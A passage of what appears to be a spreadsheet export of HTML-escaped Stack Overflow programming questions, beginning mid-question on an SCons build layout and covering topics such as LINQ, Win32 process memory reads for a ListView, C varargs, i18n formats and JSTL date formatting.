&lt;li&gt;Prj2 is a DLL that exports some functions&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The problem I'm running into is that the library builds its .obj, .pdb, .lib, .dll, etc. files in the same directory as it's SConscript file while the EXE builds its files in the same directory as its SConscript. The application successfully builds both the Prj2 dependency and itself. However, you cannot run the resulting EXE because it can't find the library it needs because it is in the other directory.&lt;/p&gt;
&lt;h2&gt;Question&lt;/h2&gt;
&lt;p&gt;How can I get multiple projects that have dependences to output their binaries and debug information into a common directory so that they can be executed and debugged?&lt;/p&gt;
&lt;h2&gt;Potential Solutions&lt;/h2&gt;
&lt;p&gt;This is what I have thought of so far:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;I tried using VariantDir (previously called BuildDir) however this doesn't seem to work. Perhaps I'm messing something up here.&lt;/li&gt;
&lt;li&gt;I could potentially tell the compiler and the linker explicitly (via Fo/Fd for example) where to drop their files (is this the best or only solution???)&lt;/li&gt;
&lt;li&gt;Execute a copy command on the resulting binaries (this seems like a hack and quite a pain to manage/maintain)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Update&lt;/h2&gt;
&lt;p&gt;I updated the File Structure and file contents below to reflect the working solution in it's entirety. Thanks to grieve for his insight.&lt;/p&gt;
&lt;h2&gt;Command&lt;/h2&gt;
&lt;p&gt;With this configuration, you must unfortunately execute the build by cd'ing to the build directory and then running the command below. I need to get a properly working alias setup to get around this.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
build&gt; scons ../bin/project1.exe
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;File Structure&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;    /scons-sample
       /bin
          /release
          /debug
       /build
           SConstruct
           scons_helper.py
       /prj1
           SConscript
           /include
           /src
              main.cpp
       /prj2
          SConscript
          /include
             functions.h
          /src
             functions.cpp
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;SConstruct&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;
import os.path
BIN_DIR = '../bin'
OBJ_DIR = './obj'
#--------------------------------------
#            CxxTest Options
#--------------------------------------
CXXTEST_DIR = '../extern/CxxTest/CxxTest-latest'
PERL = 'perl -w'
TESTS = '*.h'
TESTGEN = PERL + CXXTEST_DIR + '/cxxtestgen.pl'
CXXTESTGEN_FLAGS = '--runner=ParenPrinter \
                    --abort-on-fail \
                    --have-eh'
#--------------------------------------
#            Options
#--------------------------------------
SetOption( 'implicit_cache', 1 )
# command line options
opts = Options()
opts.AddOptions(
EnumOption(
            'debug',
        	'Debug version (useful for developers only)',
        	'no',
        	allowed_values = ('yes', 'no'),
        	map = { },
        	ignorecase = 1
        )
)
#--------------------------------------
#           Environment
#--------------------------------------
env = Environment( 
    options = opts,
    #--------------------------------------
    #           Linker Options
    #--------------------------------------
    LIBPATH = [
                '../extern/wxWidgets/wxWidgets-latest/lib/vc_dll'
              ],
    LIBS =  [
               # 'wxmsw28d_core.lib',
               # 'wxbase28d.lib',
               # 'wxbase28d_odbc.lib',
               # 'wxbase28d_net.lib',
                'kernel32.lib',
                'user32.lib',
                'gdi32.lib',
                'winspool.lib',
                'comdlg32.lib',
                'advapi32.lib',
                'shell32.lib',
                'ole32.lib',
                'oleaut32.lib',
                'uuid.lib',
                'odbc32.lib',
                'odbccp32.lib'
            ],
    LINKFLAGS = '/nologo /subsystem:console /incremental:yes /debug /machine:I386',
    #--------------------------------------
    #           Compiler Options
    #--------------------------------------
    CPPPATH = [
                './include/', 
                '../extern/wxWidgets/wxWidgets-latest/include',
                '../extern/wxWidgets/wxWidgets-latest/vc_dll/mswd'
               ],
    CPPDEFINES = [ 
                    'WIN32',
                    '_DEBUG',
                    '_CONSOLE',
                    '_MBCS',
                    'WXUSINGDLL',
                    '__WXDEBUG__'
                 ],
    CCFLAGS = '/W4 /EHsc /RTC1 /MDd /nologo /Zi /TP /errorReport:prompt'
)
env.Decider( 'MD5-timestamp' )        # For speed, use timestamps for change, followed by MD5
Export( 'env', 'BIN_DIR' )          # Export this environment for use by the SConscript files
#--------------------------------------
#           Builders
#--------------------------------------
SConscript( '../prj1/SConscript' )
SConscript( '../prj2/SConscript' )
Default( 'prj1' )
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;scons_helper.py&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;
import os.path
#--------------------------------------
#            Functions
#--------------------------------------
# Prepends the full path information to the output directory so that the build
# files are dropped into the directory specified by trgt rather than in the 
# same directory as the SConscript file.
# 
# Parameters:
#   env     - The environment to assign the Program value for
#   outdir  - The relative path to the location you want the Program binary to be placed
#   trgt    - The target application name (without extension)
#   srcs    - The list of source files
# Ref:
#   Credit grieve and his local SCons guru for this: 
#   http://stackoverflow.com/questions/279860/how-do-i-get-projects-to-place-their-build-output-into-the-same-directory-with
def PrefixProgram(env, outdir, trgt, srcs):
    env.Program(target = os.path.join(outdir, trgt), source = srcs)
# Similar to PrefixProgram above, except for SharedLibrary
def PrefixSharedLibrary(env, outdir, trgt, srcs):
    env.SharedLibrary(target = os.path.join(outdir, trgt), source = srcs)
def PrefixFilename(filename, extensions):
    return [(filename + ext) for ext in extensions]
# Prefix the source files names with the source directory
def PrefixSources(srcdir, srcs):
    return  [os.path.join(srcdir, x) for x in srcs]
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;SConscript for Prj1&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;
import os.path
import sys
sys.path.append( '../build' )
from scons_helper import *
Import( 'env', 'BIN_DIR' )        # Import the common environment
prj1_env = env.Clone()          # Clone it so we don't make changes to the global one
#--------------------------------------
#           Project Options
#--------------------------------------
PROG = 'project1'
#--------------------------------------
#            Header Files
#--------------------------------------
INC_DIR = [
            '../prj2/include'
          ]
HEADERS = [
            ''
          ]
#--------------------------------------
#            Source Files
#--------------------------------------
SRC_DIR = './src'
SOURCES = [
            'main.cpp'
          ]
# Prefix the source files names with the source directory
SOURCES = PrefixSources( SRC_DIR, SOURCES )
#--------------------------------------
#      Compiler and Linker Overrides
#--------------------------------------
prj1_env.Append(
    CPPPATH = INC_DIR,
    LIBS = 'project2',
    LIBPATH = BIN_DIR,
    # Microsoft Visual Studio Specific
    PDB = os.path.join( BIN_DIR, PROG + '.pdb' )
)
#--------------------------------------
#            Builders
#--------------------------------------
PrefixProgram( prj1_env, BIN_DIR, PROG, SOURCES )
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;SConscript for Prj2&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;
import os.path   
import sys
sys.path.append( '../build' )
from scons_helper import *
Import( 'env', 'BIN_DIR' )        # Import the common environment
prj2_env = env.Clone()          # Clone it so we don't make changes to the global one
#--------------------------------------
#           Project Options
#--------------------------------------
PROG = 'project2'
#--------------------------------------
#            Header Files
#--------------------------------------
INC_DIR = [
             ''
          ]
HEADERS = [
            'functions.h'
          ]
#--------------------------------------
#            Source Files
#--------------------------------------
SRC_DIR = './src/'
SOURCES = [
            'functions.cpp'
          ]
# Prefix the source files names with the source directory
SOURCES = PrefixSources( SRC_DIR, SOURCES )
#--------------------------------------
#      Compiler and Linker Overrides
#--------------------------------------
# Update the environment with the project specific information
prj2_env.Append(
    CPPPATH = INC_DIR,
    # Microsoft Visual Studio Specific
    PDB = os.path.join( BIN_DIR, PROG + '.pdb' )
)
#--------------------------------------
#               Builders
#--------------------------------------
PrefixSharedLibrary( prj2_env, BIN_DIR, PROG, SOURCES )
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Where can I find sample code on mouse movements and polygon spins in OpenGL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Where can I find sample code on mouse movements and polygon spins in OpenGL?
I am using Java, so sample code in Java is preferred.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Corner radius in Adobe Air application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can we make rounded corners on the vbox control in the Air
application?&lt;/p&gt;
&lt;p&gt;I am hiding the header and setting transparent to true, but then it does not show
me rounded corners on the VBox in the application. I am showing this VBox
to the user.&lt;/p&gt;
&lt;p&gt;Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>3D laser scanner capturing normals?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The Lab university I work at is in the process of purchasing a laser scanner for scanning 3D objects. All along from the start we've been trying to find a scanner that is able to capture real RAW normals from the actual scanned surface. It seems that most scanners only capture points and then the software interpolates to find the normal of the approximate surface.&lt;/p&gt;
&lt;p&gt;Does anybody know if there is actually such a thing as capturing raw normals? Is there a scanner that can do this and not interpolate the normals from the point data?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>i18n - best practices for internationalization - XLIFF, gettext, INI, ...?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;EDIT: &lt;strong&gt;I would really like to see some general discussion about the formats, their pros and cons!&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;EDIT2: The 'bounty didn't really help to create the needed discussion, there are a few interesting answers but the comprehensive coverage of the topic is still missing. Six persons marked the question as favourites, which shows me that there is an interest in this discussion.&lt;/p&gt;
&lt;p&gt;When deciding about &lt;strong&gt;internationalization&lt;/strong&gt; the toughest part IMO is the choice of storage format.&lt;/p&gt;
&lt;p&gt;For example the Zend PHP Framework offers the following adapters which cover pretty much all my options:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Array    : no, hard to maintain&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;CSV      : don't know, possible problems with encoding&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Gettext  : frequently used, poEdit for all platforms available BUT complicated&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;INI      : don't know, possible problems with encoding&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;TBX      : no clue&lt;/li&gt;
&lt;li&gt;TMX      : too much of a big thing? no editors freely available.&lt;/li&gt;
&lt;li&gt;QT       : not very widespread, no free tools&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;XLIFF    : the comming standard? BUT no free tools available.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;XMLTM    : no, not what I need&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;basically I'm stuck with the 4 'bold' choices. I would like to use INI files but I'm reading about the encoding problems... is it really a problem, if I use strict UTF-8 (files, connections, db, etc.)?&lt;/p&gt;
&lt;p&gt;I'm on Windows and I tried to figure out how poEdit functions but just didn't manage. No tutorials on the web either, is &lt;strong&gt;gettext&lt;/strong&gt; still a choice or an endangered species anyways?&lt;/p&gt;
&lt;p&gt;What about &lt;strong&gt;XLIFF&lt;/strong&gt;, has anybody worked with it? Any tips on what tools to use?&lt;/p&gt;
&lt;p&gt;Any ideas for &lt;strong&gt;Eclipse&lt;/strong&gt; integration of any of these technologies?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does LINQ to Entities reuse instances of objects?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Using LINQ to Entities sounds like a great way to query against a database and get actual CLR objects that I can modify, data bind against and so forth. But if I perform the same query a second time do I get back references to the same CLR objects or an entirely new set? &lt;/p&gt;
&lt;p&gt;I do not want multiple queries to generate an ever growing number of copies of the same actual data. The problem here is that I could alter the contents of one entity and save it back to the database but another instance of the entity is still in existence elsewhere and holding the old data.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Enabling/Disabling Aero from a Windows Service</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have some code to enable/disable the Windows Aero service in Vista, and I would like to run it in a Windows Service. The code works in a standalone application, but when I run it from a Service, nothing happens. No errors or exceptions are thrown.&lt;/p&gt;
&lt;p&gt;I realise that running code in a service is a different scope than running code in an application, but in this case, how would I enable/disable Aero from the service? Is this even possible? &lt;/p&gt;
&lt;p&gt;Here is the code I am working with:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static readonly uint DWM_EC_DISABLECOMPOSITION = 0;
public static readonly uint DWM_EC_ENABLECOMPOSITION = 1;
[DllImport("dwmapi.dll", EntryPoint="DwmEnableComposition")]
protected static extern uint Win32DwmEnableComposition(uint uCompositionAction);
public static bool EnableAero() 
{
    Win32DwmEnableComposition(DWM_EC_ENABLECOMPOSITION);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Edit: &lt;/p&gt;
&lt;p&gt;It turns out that the DwmEnableComposition call is returning HRESULT 0x80070018, or ERROR_BAD_LENGTH. Seems like a strange error, since the code works when not running as a service.&lt;/p&gt;
&lt;p&gt;I also tried changing the entire thing to the following code, but got the same result. It sets the window station and desktop, and it seems to be correct, but the call to DwmEnableComposition results in the same error. I've not included the PInvoke declarations for brevity.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    protected override void OnStop()
    {
        IntPtr winStation = OpenWindowStation("winsta0", true, 0x10000000 /* GENERIC_ALL */);
        if (winStation == null || winStation.ToInt32() == 0)
        {
            String err = new Win32Exception(Marshal.GetLastWin32Error()).Message;
        }
        if (!SetProcessWindowStation(winStation))
        {
            String err = new Win32Exception(Marshal.GetLastWin32Error()).Message;
        }
        uint thread = GetCurrentThreadId();
        IntPtr hdesk = OpenInputDesktop(0, false, 0x10000000 /* GENERIC_ALL */);
        if (hdesk == null || hdesk.ToInt32() == 0)
        {
            String err = new Win32Exception(Marshal.GetLastWin32Error()).Message;
        }
        if (!SetThreadDesktop(hdesk))
        {
            String err = new Win32Exception(Marshal.GetLastWin32Error()).Message;
        }
        uint result = Win32DwmEnableComposition(DWM_EC_DISABLECOMPOSITION);
        if (result != 0)
        {
            String err = new Win32Exception(Marshal.GetLastWin32Error()).Message;
        }
    }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Java File.canWrite() on Vista and super hidden files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have some code that effectively does this :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;File file = new File("C:\\Program Files (x86)\\Something\\fred.txt");
System.out.println("file.canWrite() = " + file.canWrite());
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It prints true.
Now the odd thing is, I can create the file without any exceptions. Furthermore, another program can read the file I've created. The thing is, in Windows Explorer, the file doesn't show up at all!&lt;/p&gt;
&lt;p&gt;Show hidden files you may be thinking, but no, I've got that option turned on.&lt;/p&gt;
&lt;p&gt;I've also found out about 'super hidden files' in Vista, so I've turned that option on and I still can't see the file! Maybe I haven't edited my registry correctly - I can only assume the file is super hidden - where else could it be?&lt;/p&gt;
&lt;p&gt;Now the problem is that I'm creating an html file and the when I fire up a browser, it can't see the html file because it's super hidden.&lt;/p&gt;
&lt;p&gt;How can I prevent Java creating a super hidden file? This is running under JRE 6 update 6.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Random image picker PHP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;$images = array();
$images[0][0] = "boxes/blue.jpg";
$images[0][1] = "blah.html";
$images[1][0] = "boxes/green.jpg";
$images[1][1] = "blah.html";
$images[2][0] = "boxes/orange.jpg";
$images[2][1] = "blah.html";
$images[3][0] = "boxes/pink.jpg";
$images[3][1] = "blah.html";
$images[4][0] = "boxes/purple.jpg";
$images[4][1] = "blah.html";
$images[5][0] = "boxes/red.jpg";
$images[5][1] = "blah.html";
$images[6][0] = "boxes/yellow.jpg";
$images[6][1] = "blah.html";
$i = 0;
*echo "&amp;lt;a href='" . $images[0][1] . "'&amp;gt;&amp;lt;img src='" . $images[0][0] . "' /&amp;gt;&amp;lt;/a&amp;gt;";
$boxes = array();
while($i&amp;lt;5)
{
	$rand = rand(0,(sizeof($images)-1));
	//echo $rand;
	$slice = array_splice($images, $rand);
	$boxes[$i] = $slice;
	$i++;
}*
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am trying to get a random image picker to choose from a list of images provided by the $images array. However, I am unable to fill the $boxes array with anything other than "Array". Can anyone tell me why? Any help is much appreciated&lt;/p&gt;
&lt;p&gt;UPDATE&lt;/p&gt;
&lt;p&gt;I am now using the code below and it breaks whenever it comes across an empty element. Unless i am very much mistaken, shouldn't splice patch up holes like that?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$rand = rand(0,(sizeof($images)));
array_splice($images, $rand);
$i = 0;
while($i&amp;lt;5)
{
	echo "&amp;lt;a href='" . $images[$i][1] . "'&amp;gt;&amp;lt;img src='" . $images[$i][0] . "' /&amp;gt;&amp;lt;/a&amp;gt;";
	$i++;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Alternative to HttpListener?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm developing an application that is so far using HttpListener to provide a small standalone http server. However, I've recently discovered that HttpListener needs to be run as Administrator, which is not always going to be possible.&lt;/p&gt;
&lt;p&gt;What would the best alternative be? I need http GET and POST, both of which are not simply reading/writing files on the filesystem, they need to run custom .Net code.&lt;/p&gt;
&lt;p&gt;My research so far has brought up Cassini, but as far as I can tell, I would have to write a custom version. Is there anything else? In partiular something with the same interface as HttpListener, but that does not require Administrator privileges would be amazing!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I automatically fail a nant build if NDepend query raises a warning</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;OK first some background. I am busy automating our build process.  We run a mixture of Vs 2005 and VS 2008 both targeting platform 2.0.  We use Nant to do our builds using the MSBUILD task to do the compile and Cruise Control .net to do our CI.  Currently we treat all warnings as errors, fail the build if any FxCop rules fail (except a small subset that we disabled), fail the build if Simian detects any code duplication of more than 5 lines across all projects.&lt;/p&gt;
&lt;p&gt;I have written NDepend CQL query to enforce a few rules that are hard to implement in FxCop.  I want to fail the build if the number of lines in a method/class breach a certain limit.  I also want to fail if the cyclomatic complexity of a method is too high.&lt;/p&gt;
&lt;p&gt;I can easily run NDepend as part of my build.  But I can't get the build to fail if my CQL queries return results &gt; 0&lt;/p&gt;
&lt;p&gt;So this is the question:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Has anybody tried something
similar? &lt;/li&gt;
&lt;li&gt;Is there a Nant task
that supports this? &lt;/li&gt;
&lt;li&gt;If there is
a Nant task that calls NDepend, but
doesn't fail the build is the source
available so I can add this feature?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Thanks,
Stephen&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Calling a C function with a varargs argument dynamically</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am programming in C against a third party library (in HP/Mercury Loadrunner) that allows a varargs-style variable size argument list for one of it's functions. I want to call this function but I do not know up front how many arguments I will have. &lt;/p&gt;
&lt;p&gt;There is a function made by one of my predecessors that serves somewhat but the problem here is that this function assumes the worst case scenario (over 3000 arguments) and hand-codes for that.&lt;/p&gt;
&lt;p&gt;To illuminate, here's the (beginning of) the code. The function we call is &lt;code&gt;web_submit_data()&lt;/code&gt;. It will HTTP post a set of form data. This implementation came about when dealing with dynamically generated forms with an arbitrary number of fields.
(Cleaned up a fair bit from the original, which hand coded indexes by hand as well..)&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;web_submit_data_buffer_gazillion_items( const char *bufferName, const char *bufferValue)
{
    const int size = 129;
    int i = 0;
    int j = 11;
    web_submit_data(&amp;amp;bufferName[i++ * size], //"some form"
				&amp;amp;bufferName[i++ * size], //"Action=https://blah.blah/form");
				&amp;amp;bufferName[i++ * size], //"Method=POST");
				&amp;amp;bufferName[i++ * size], //"TargetFrame=");
				&amp;amp;bufferName[i++ * size], //"RecContentType=text/html");
				&amp;amp;bufferName[i++ * size], //"Referer=https://blah.blah/index.html");
				&amp;amp;bufferName[i++ * size], //"Snapshot=t1.inf");
				&amp;amp;bufferName[i++ * size], //"Mode=HTML");
				ITEMDATA,  // missing in action: indexes 8 through 10
				&amp;amp;bufferName[j * size],&amp;amp;bufferValue[j++ * size], ENDITEM, 
				&amp;amp;bufferName[j * size],&amp;amp;bufferValue[j++ * size], ENDITEM, 
				&amp;amp;bufferName[j * size],&amp;amp;bufferValue[j++ * size], ENDITEM, 
..
(repeat the last 3 lines ad nauseum)
..
				&amp;amp;bufferName[j * size],&amp;amp;bufferValue[j++ * size], ENDITEM,
				&amp;amp;bufferName[j * size]);  
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now I have found an external library that might work (&lt;a href="http://www.dyncall.org"&gt;http://www.dyncall.org&lt;/a&gt;) but I would much rather not a) be completely processor dependant and b) attempt to teach Loadrunner about linking in external sources..&lt;/p&gt;
&lt;p&gt;Edit: 
The original function used hardcoded indexes instead of using a variable. Can still revert to that if it turns out to be too unpredictable. However, as I am unlikely to run this with a different compiler or hardware / OS I doubt that really is worth it.&lt;/p&gt;
&lt;p&gt;Also: I don't have control over the implementation of web_submit_data(). So just pushing the problem down one level isn't going to cut it..&lt;/p&gt;
&lt;p&gt;Another thing to note: The spec for &lt;code&gt;web_submit_data()&lt;/code&gt; uses a constant called LAST to mark the end of the argument list. The original implementation doesn't use it. Presumably the callsite does ..&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Protecting Javascript Code in a FF extension</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking to protect the code of my Firefox extension because it has server calls in it that no would be a security risk if someone could make them outside of the extension. Any suggestions on how to encrypt it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>RegEx to replace value including new lines</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a snippet looking something like the below.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;string bodyTypeAssemblyQualifiedName = "XXX.XX.XI.CustomerPayment.Schemas.r1.CustomerPayments_v01, XXX.XX.XI.CustomerPaym" +
                "ent.Schemas.r1, Version=1.0.0.0, Culture=neutral, PublicKeyToken=ac564f277cd4488" +
                "e";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'd like use regular expression in C# to get it to: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;string bodyTypeAssemblyQualifiedName = null;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've tried using a RegEx like the below but it doesn't match the newlines ...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;bodyTypeAssemblyQualifiedName\s=\s(?&amp;lt;location&amp;gt;.*?);
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Is there a good HttpClient library for J2ME/MIDP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to call some RESTful web services from a J2ME client running on a MIDP enabled mobile device. I read the MIDP api for HTTPConnections and thought this is just crying out for a simple wrapper to hide all those unpleasant byte arrays and such like. Before I write my own I wondered whether there was a good open source library already available.&lt;/p&gt;
&lt;p&gt;-FE- &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Win32 WriteProcessMemory() magical offset value</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to read the data in a Win32 ListView owned by another process. Unfortunately, my WriteProcessMemory() call fails with the error "This function is not supported on this system." when I specify "NULL" for the base address in my VirtualAlloc() call. If, however, I offset that VirtualAlloc() address by some "magic" value that I got lucky with and picked at random during a moment of frustration, the call works on my system, but fails on other ones. (see the code below)&lt;/p&gt;
&lt;p&gt;Can anybody suggest what this magical offset is doing for me? By trial and error, I can find values that work on specific systems, but I can't find a general solution to this problem.&lt;/p&gt;
&lt;p&gt;Thanks,
PaulH&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#define MAGIC_OFFSET (DWORD)0x01020000
LVHITTESTINFO hti   = { 0 };
hti.pt              = clientPoint;
LPVOID lpBuffer = ::VirtualAlloc( NULL, 1, MEM_RESERVE, PAGE_READWRITE );
::VirtualFree( lpBuffer, 0, MEM_RELEASE );
lpBuffer = ::VirtualAlloc( (LPVOID)((DWORD)lpBuffer + MAGIC_OFFSET), sizeof( hti ), MEM_RESERVER, PAGE_READWRITE );
DWORD dwBuffer = (DWORD)lpBuffer + MAGIC_OFFSET - sizeof( hti );
if( !::WriteProcessMemory( hProcess, (LPVOID)dwBuffer, (LPVOID)&amp;amp;hti, sizeof( hti ), NULL ) )
    return 0;
if( ListView_HitTest( hWndListView, (LPVOID)dwBuffer ) &amp;lt; 0 )
    return 0;
if( !::ReadProcessMemory( hProcess, (LPVOID)dwBuffer, (LPVOID)&amp;amp;hti, sizeof( hti ), NULL ) )
    return 0;
::VirtualFree( lpBuffer, 0, MEM_RELEASE );
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Clarification (added by Cd-MaN): this is on a Windows Mobile platform, probably non-x86 architecture. So the situation may be different (are there separate address spaces in ARM processors?).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Unpacking MSI in .Net</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an installer that deploys web services to IIS.  After this has finshed a custom action fires that updates the database with the scripts required by the webservices.  The scripts are currently deploying to IIS aswell because they are part of the .net project.  How can I configure the installation process so the scripts arn't part of the project and get un-packed from the MSI so my custom action can access them?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to use/access scalar functions with LINQ to SQL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have scalar functions in our database for returning things like "number of tasks for a customer" or "total invoice amount for a customer".  &lt;/p&gt;
&lt;p&gt;We are experimenting and looking to try to do this w/o stored procedures ... normally we would just call this function in our stored procedure and return it as a single value. &lt;/p&gt;
&lt;p&gt;Is there a way to use or access scalar functions with LINQ to SQL?  If so, I would be interested in see an example of how to ... if not, how would it be best to handle this type of situation ... if it is even doable.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>RGB back buffer in Win32</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an array of RGB values, whose size I can guarantee to match the client area of a window on screen.&lt;/p&gt;
&lt;p&gt;Using the Win32 API, what are the easiest and fastest ways to get the contents of my array on the screen in response to a WM_PAINT message?&lt;/p&gt;
&lt;p&gt;If it makes it simpler/faster, we can assume it's a 32-bit display and each element of the array is 32 bits.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Most elegant UI for categorizing items?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a collection of items that the user needs to group/categorize in several ways. For the sake of an example, let's say it's a collection of cars and the user wants to categorize them in the following ways:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Color (red, silver, blue, black, etc.)&lt;/li&gt;
&lt;li&gt;Body shape (hatch, sedan, coupe, stationwagon, etc.)&lt;/li&gt;
&lt;li&gt;Seats (2, 4, 5, 6, etc.)&lt;/li&gt;
&lt;li&gt;etc.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Have you ever come across a particularly elegant way of doing this that allows the user full freedom to define their own categories and values?&lt;/p&gt;
&lt;p&gt;Obviously, there will many be trade-offs to make in any design. For example, a learnable design might not be efficient, and vice versa. Or some designs may be more demanding of real estate than others. And some will take significantly longer to develop than others.&lt;/p&gt;
&lt;p&gt;Regardless, if you've seen -- or designed -- a good pattern for this, I'd be interested to hear about it. If you have screenshots, all the better.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Attempt at clarification&lt;/strong&gt;: tags are indeed a great way of categorizing things, but in all implmentations I've seen, there's only ever one level of tagging. The user doesn't generally get to define a category/property and the item's value &lt;em&gt;in that category&lt;/em&gt;. To use the example above and StackOverflow's tagging, you'd tag a car as "blue", "sedan", "4", and so on. StackOverflow would have no inherent knowledge that an item couldn't be tagged as both "sedan" and "coupe".&lt;/p&gt;
&lt;p&gt;The interface I'm thinking of would need to know that kind of thing, so the user-defined attributes suggestion is more along the lines of what I'm thinking. I'm just keen to find a concrete example of how that kind of system could be elegantly implemented (in a desktop app, if that makes a difference).&lt;/p&gt;
&lt;p&gt;Is that any clearer? If not, leave a comment and I'll try to clarify again. :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>release configuration management</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Our windows deliverable has different sets of config files and binary assets for different customers.  Right now the configuring is done by hand before packaging and its error prone.  What do you think of using branches for each customer, and having the package build/script automerge the customer's branch with trunk?&lt;/p&gt;
&lt;p&gt;I'm less concerned with scalability than I am of getting this automated ASAP.&lt;/p&gt;
&lt;p&gt;The entire packag contents is in SVN, but SVN branching and merging is so delicate that I don't trust it to work consistently when its automated.  If you guys like the idea I might try to use git-svn for this, because it will hopefully make merging less delicate.  We don't necessarily have to merge the assets, because they are organized so the installer can just skip inappropriate directory trees, but configuration is not so simple.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Format Date with fmt:formatDate JSP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to format a date with: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;fmt:formatDate value="${newsletter.createdOn}" pattern="MM/dd/yyyy"/&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;newsletter is an object with a &lt;code&gt;createdOn&lt;/code&gt; property which is &lt;code&gt;java.util.Date&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;When I invoke the previous sentence I get: &lt;/p&gt;
&lt;p&gt;According to the TLD, the attribute value does not accept expressions.   &lt;/p&gt;
&lt;p&gt;I am importing fmt with &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;%@ taglib prefix="fmt" uri="http://java.sun.com/jstl/fmt" %&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Does anyone know how can I work around this problem?&lt;/p&gt;
&lt;p&gt;I am using the jstl.jar coming with tomcat. &lt;/p&gt;
